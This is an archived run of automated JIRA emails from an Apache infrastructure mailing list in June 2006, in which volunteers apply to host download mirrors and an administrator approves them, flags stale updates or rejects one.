X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-803?page=all ] Joshua Slive resolved INFRA-803: -------------------------------- Resolution: Fixed Thanks. This will be in the next update. > new mirror > ---------- > > Key: INFRA-803 > URL: http://issues.apache.org/jira/browse/INFRA-803 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mirrors > Environment: linux fedora 4, apache 2 > Reporter: Nicolas INNOCENT > Priority: Minor > > * URL of mirror : http://apache.ntspace.net > * Country where the mirror is located : germany (at 1km of french border) > * Contact email address : [email protected] > * Update frequency : 6 hours (last time : 1147535281) > * Rsync repository used : rsync.eu.apache.org > * Approximate bandwidth : 100mb/s > * I have configured my HTTP server as requested (yes/no) : yes > * I have subscribed to the mirror maintainers mailing list (yes/no) : yes > logo : http://promo.ntspace.net/ntspace.gif > site url : http://www.ntspace.net > the site will be officially in production in june, 1st, but it should work as of now -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:17:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14435 invoked from network); 16 Jun 2006 14:17:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:17:51 -0000 Received: (qmail 58898 invoked by uid 500); 16 Jun 2006 14:17:48 -0000 Delivered-To: [email protected] Received: (qmail 58691 invoked by uid 500); 16 Jun 2006 14:17:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58680 invoked by uid 99); 16 Jun 2006 14:17:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:17:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:17:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2D09571428D for <[email protected]>; Fri, 16 Jun 2006 14:16:30 +0000 (GMT) Message-ID: <32553313.1150467390166.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:16:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-819) New Mirror In-Reply-To: <4763192.1148460991423.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-819?page=comments#action_12416507 ] Joshua Slive commented on INFRA-819: ------------------------------------ It appears this mirror hasn't been updated since June 10. Please let us know if this is a temporary problem. > New Mirror > ---------- > > Key: INFRA-819 > URL: http://issues.apache.org/jira/browse/INFRA-819 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mirrors > Reporter: Jurriaan Duindam > > URL: http://apache.mirror.rokscom.nl > Country: the Netherlands > [email protected] > Update frequency: 4 times a day > Rsync repository used: rsync.eu.apache.org > Approximate bandwidth 100 MBit > I have configured my HTTP server as requested yes > I have subscribed to the mirror maintainers mailing list yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:19:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15558 invoked from network); 16 Jun 2006 14:19:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:19:50 -0000 Received: (qmail 63960 invoked by uid 500); 16 Jun 2006 14:19:48 -0000 Delivered-To: [email protected] Received: (qmail 63663 invoked by uid 500); 16 Jun 2006 14:19:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63623 invoked by uid 99); 16 Jun 2006 14:19:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:19:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:19:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 34C5171428D for <[email protected]>; Fri, 16 Jun 2006 14:18:30 +0000 (GMT) Message-ID: <25090924.1150467510213.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:18:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-818) Please add new mirror to list In-Reply-To: <3825903.1148400810348.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-818?page=all ] Joshua Slive resolved INFRA-818: -------------------------------- Resolution: Fixed Thanks. This will be in the next update. > Please add new mirror to list > ----------------------------- > > Key: INFRA-818 > URL: http://issues.apache.org/jira/browse/INFRA-818 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mirrors > Reporter: Benjamin Holmberg > Priority: Minor > > Hi, we've got a mirror established and want to be listed as an official mirror. > URL of mirror http://www.uniontransit.com/apache > Country where the mirror is located United States (Fremont, California) > Contact email address [email protected] > Update frequency 4x daily > Rsync repository used rsync.apache.org > Approximate bandwidth 100 Mbit I think (our server is within Hurricane Electric's network). Here is the output from rsync if this helps... > wrote 189079 bytes read (548)664-7369 bytes 1784786.95 bytes/sec total size is 8491527016 speedup is 2.00 > I have configured my HTTP server as requested Yes > I have subscribed to the mirror maintainers mailing list Yes > URL of the logo we'd like to use: http://www.uniontransit.com/uniontransit_apache.gif -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:20:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17303 invoked from network); 16 Jun 2006 14:20:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:20:07 -0000 Received: (qmail 65173 invoked by uid 500); 16 Jun 2006 14:19:56 -0000 Delivered-To: [email protected] Received: (qmail 64592 invoked by uid 500); 16 Jun 2006 14:19:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64267 invoked by uid 99); 16 Jun 2006 14:19:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:19:50 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:19:49 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 13E3E71429D for <[email protected]>; Fri, 16 Jun 2006 14:18:33 +0000 (GMT) Message-ID: <27853893.1150467513078.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:18:33 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-820) new http mirror for apache.org with german location In-Reply-To: <18624937.1148647955639.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-820?page=comments#action_12416511 ] Joshua Slive commented on INFRA-820: ------------------------------------ It appears this mirror hasn't been updated since June 13. If this is a temporary problem, please let us know. > new http mirror for apache.org with german location > --------------------------------------------------- > > Key: INFRA-820 > URL: http://issues.apache.org/jira/browse/INFRA-820 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mirrors > Environment: 100mbit vserver, only apache-mirror is installed yet, german location, 40gig of harddisc, 1TB transferlimit > Reporter: Tim Muthmann > > URL of mirror: http://apache.webdesign-zdg.de > Country where the mirror is located: Germany > Contact email address: [email protected] > Update frequency: Daily > Rsync repository used: i dont know what you want to know?! > Approximate bandwidth: 100mBit > I have configured my HTTP server as requested (yes) > I have subscribed to the mirror maintainers mailing list (yes) > Dear Ladies and Gentlemen, > we would like you to display our logo (http://www.zentrum-der-gesundheit.de/images/zdg_logo_100_31.jpg) and send people to this adress: http://www.zentrum-der-gesundheit.de > Thanks a lot > Tim Muthmann -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:21:51 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17979 invoked from network); 16 Jun 2006 14:21:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:21:50 -0000 Received: (qmail 68911 invoked by uid 500); 16 Jun 2006 14:21:48 -0000 Delivered-To: [email protected] Received: (qmail 68563 invoked by uid 500); 16 Jun 2006 14:21:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68552 invoked by uid 99); 16 Jun 2006 14:21:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:21:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:21:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 335F771428D for <[email protected]>; Fri, 16 Jun 2006 14:20:30 +0000 (GMT) Message-ID: <28658396.1150467630186.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:20:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-822) New mirror located in Amsterdam, The Netherlands In-Reply-To: <25928230.1148992849801.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-822?page=all ] Joshua Slive resolved INFRA-822: -------------------------------- Resolution: Invalid Thanks for the offer of a mirror. But your mirror uses a "fancy" interface that doesn't display our README/HEADER files. Given that we already have a huge number of NL mirrors, I'm going to pass on one that doesn't follow all our config recommendations. Thanks anyway. > New mirror located in Amsterdam, The Netherlands > ------------------------------------------------ > > Key: INFRA-822 > URL: http://issues.apache.org/jira/browse/INFRA-822 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mirrors > Reporter: Jur Rademakers > > URL of mirror: > HTTP: http://apache.osmirror.nl/ > FTP: ftp://ftp.osmirror.nl/pub/apache/ > RSYNC: rsync://rsync.osmirror.nl/apache/ > Country where the mirror is located: Netherlands > Contact email address: [email protected] > Update frequency: */6 > Rsync repository used: rsync.eu.apache.org > Approximate bandwidth: 100Mbps > I have configured my HTTP server as requested: yes > I have subscribed to the mirror maintainers mailing list: yes > Logo: http://www.osmirror.nl/img/logo_apache.jpg > Link: http://www.osmirror.nl/ > If you have any questions, please let me know. > Regards, > Jur Rademakers -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:22:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18891 invoked from network); 16 Jun 2006 14:21:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:21:59 -0000 Received: (qmail 69268 invoked by uid 500); 16 Jun 2006 14:21:53 -0000 Delivered-To: [email protected] Received: (qmail 68996 invoked by uid 500); 16 Jun 2006 14:21:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68921 invoked by uid 99); 16 Jun 2006 14:21:49 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:21:48 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:21:47 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1C3B5714294 for <[email protected]>; Fri, 16 Jun 2006 14:20:31 +0000 (GMT) Message-ID: <28030985.1150467631112.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:20:31 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-827) New mirror - please add In-Reply-To: <9824324.1149212971303.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-827?page=comments#action_12416513 ] Joshua Slive commented on INFRA-827: ------------------------------------ It appears your mirror hasn't updated since June 13. If this is a temporary problem, please let us know. > New mirror - please add > ----------------------- > > Key: INFRA-827 > URL: http://issues.apache.org/jira/browse/INFRA-827 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mirrors > Reporter: Phil Evans > > URL of mirror: http://mirrors.probonic.com/apache/ ftp://mirrors.probonic.com/apache/ > Country: United States, TX > Contact email: [email protected] > Update frequency: 4 times a day > Rsync repository used: rsync.apache.org > Approx. bandwidth: 100mbit > I have configured my HTTP server as requested: yes > I have subscribed to the mirror maintainers mailing list: yes > URL to 100x34 logo: http://www.probonic.com/images/logo10034.gif > Link for image: http://www.probonic.com > Thank you. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:23:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19832 invoked from network); 16 Jun 2006 14:23:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:23:51 -0000 Received: (qmail 71357 invoked by uid 500); 16 Jun 2006 14:23:48 -0000 Delivered-To: [email protected] Received: (qmail 71008 invoked by uid 500); 16 Jun 2006 14:23:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70996 invoked by uid 99); 16 Jun 2006 14:23:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:23:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:23:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3BBDE714293 for <[email protected]>; Fri, 16 Jun 2006 14:22:30 +0000 (GMT) Message-ID: <2584925.1150467750241.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:22:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-828) New / Renewed Mirror in USA In-Reply-To: <9343860.1149463410303.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-828?page=comments#action_12416514 ] Joshua Slive commented on INFRA-828: ------------------------------------ I don't see an update in the last 24 hours. Are you sure you are configured to do 2x per day? > New / Renewed Mirror in USA > --------------------------- > > Key: INFRA-828 > URL: http://issues.apache.org/jira/browse/INFRA-828 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Reporter: Shane S Brath > Priority: Minor > > URL of mirror : http://apache.mirrors.tds.net > Country where the mirror is located : Madison, Wisconsin, USA > Contact email address : [email protected] > Update frequency : 2 times per day ( can me more if needed ) > Rsync repository used : rsync.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist > Approximate bandwidth : 1G/s > I have configured my HTTP server as requested (yes/no) : yes > I have subscribed to the mirror maintainers mailing list (yes/no) : yes > had mirror running before, but had server problem and am now back and stable and ready to be re-added.. > Shane. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:25:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21251 invoked from network); 16 Jun 2006 14:25:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:25:52 -0000 Received: (qmail 77428 invoked by uid 500); 16 Jun 2006 14:25:48 -0000 Delivered-To: [email protected] Received: (qmail 77166 invoked by uid 500); 16 Jun 2006 14:25:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77155 invoked by uid 99); 16 Jun 2006 14:25:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:25:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:25:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3A9EF714293 for <[email protected]>; Fri, 16 Jun 2006 14:24:30 +0000 (GMT) Message-ID: <12520606.1150467870222.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:24:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-831) New NL mirror In-Reply-To: <2765780.1149597294322.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-831?page=comments#action_12416515 ] Joshua Slive commented on INFRA-831: ------------------------------------ It appears this mirror hasn't updated in quite some time. If this is a temporary problem, please let us know. > New NL mirror > ------------- > > Key: INFRA-831 > URL: http://issues.apache.org/jira/browse/INFRA-831 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Environment: apache > Reporter: Jop Verhagen > > URL of mirror -- http://apache.innostats.nl > Country where the mirror is located -- NL > Contact email address -- [email protected] > Update frequency -- twice a day > Rsync repository used -- rsync.eu.apache.org > Approximate bandwidth -- 100Mbps > I have followed the recommended configuration for my mirror -- Yes > I have subscribed to the mirror maintainers mailing list -- Yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:26:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21802 invoked from network); 16 Jun 2006 14:25:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:25:58 -0000 Received: (qmail 77903 invoked by uid 500); 16 Jun 2006 14:25:52 -0000 Delivered-To: [email protected] Received: (qmail 77592 invoked by uid 500); 16 Jun 2006 14:25:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77475 invoked by uid 99); 16 Jun 2006 14:25:49 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:25:49 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:25:47 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 918E77142A7 for <[email protected]>; Fri, 16 Jun 2006 14:24:31 +0000 (GMT) Message-ID: <15509093.1150467871593.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:24:31 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-835) Please add new mirror in Germany, Hannover In-Reply-To: <9008786.1149692311070.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-835?page=all ] Joshua Slive resolved INFRA-835: -------------------------------- Resolution: Fixed Thanks. This will be in the next update. > Please add new mirror in Germany, Hannover > ------------------------------------------ > > Key: INFRA-835 > URL: http://issues.apache.org/jira/browse/INFRA-835 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: Mirrors > Environment: Dual Xeon 2.8 Debian Sarge 3.1 > Reporter: Philipp Maske > > URL of mirror: http://apache.mirroring.de > Country: Germany, Hannover > Contact email: [email protected] > Update frequency: 4 times a day > Rsync repository used: rsync.eu.apache.org > Approx. bandwidth: 100mbit > I have configured my HTTP server as requested: yes > I have subscribed to the mirror maintainers mailing list: yes > URL to 100x34 logo: http://www.mirroring.de/footer/logo_134.jpg > Link for image: http://www.mirroring.de > Thank you. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:27:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23453 invoked from network); 16 Jun 2006 14:27:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:27:52 -0000 Received: (qmail 81736 invoked by uid 500); 16 Jun 2006 14:27:48 -0000 Delivered-To: [email protected] Received: (qmail 81469 invoked by uid 500); 16 Jun 2006 14:27:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81457 invoked by uid 99); 16 Jun 2006 14:27:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:27:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:27:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 37E48714293 for <[email protected]>; Fri, 16 Jun 2006 14:26:30 +0000 (GMT) Message-ID: <26332595.1150467990209.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:26:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-840) Apache Dist, New US Mirror In-Reply-To: <25522878.1149878430350.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-840?page=all ] Joshua Slive resolved INFRA-840: -------------------------------- Resolution: Fixed Thanks. This will be in the next update. > Apache Dist, New US Mirror > -------------------------- > > Key: INFRA-840 > URL: http://issues.apache.org/jira/browse/INFRA-840 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Reporter: Simon Clausen > Priority: Minor > > * URL of mirror: http://apache.us.lucid.dk > * Country where the mirror is located: Texas, USA > * Contact email address: [email protected] > * Update frequency: 3 times/day > * Rsync repository used: rsync.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist > * Approximate bandwidth: 100mbit, peered to SAVVIS us backbone network > * I have configured my HTTP server as requested (yes/no): Yes > * I have subscribed to the mirror maintainers mailing list (yes/no): Yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:29:57 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25103 invoked from network); 16 Jun 2006 14:29:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:29:55 -0000 Received: (qmail 85314 invoked by uid 500); 16 Jun 2006 14:29:50 -0000 Delivered-To: [email protected] Received: (qmail 85079 invoked by uid 500); 16 Jun 2006 14:29:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85068 invoked by uid 99); 16 Jun 2006 14:29:49 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:29:49 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:29:47 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1451E71429D for <[email protected]>; Fri, 16 Jun 2006 14:28:31 +0000 (GMT) Message-ID: <1168086.1150468111080.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:28:31 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-800) New mirror in Argentina In-Reply-To: <20775586.1147380034175.JavaMail.jira@brutus> 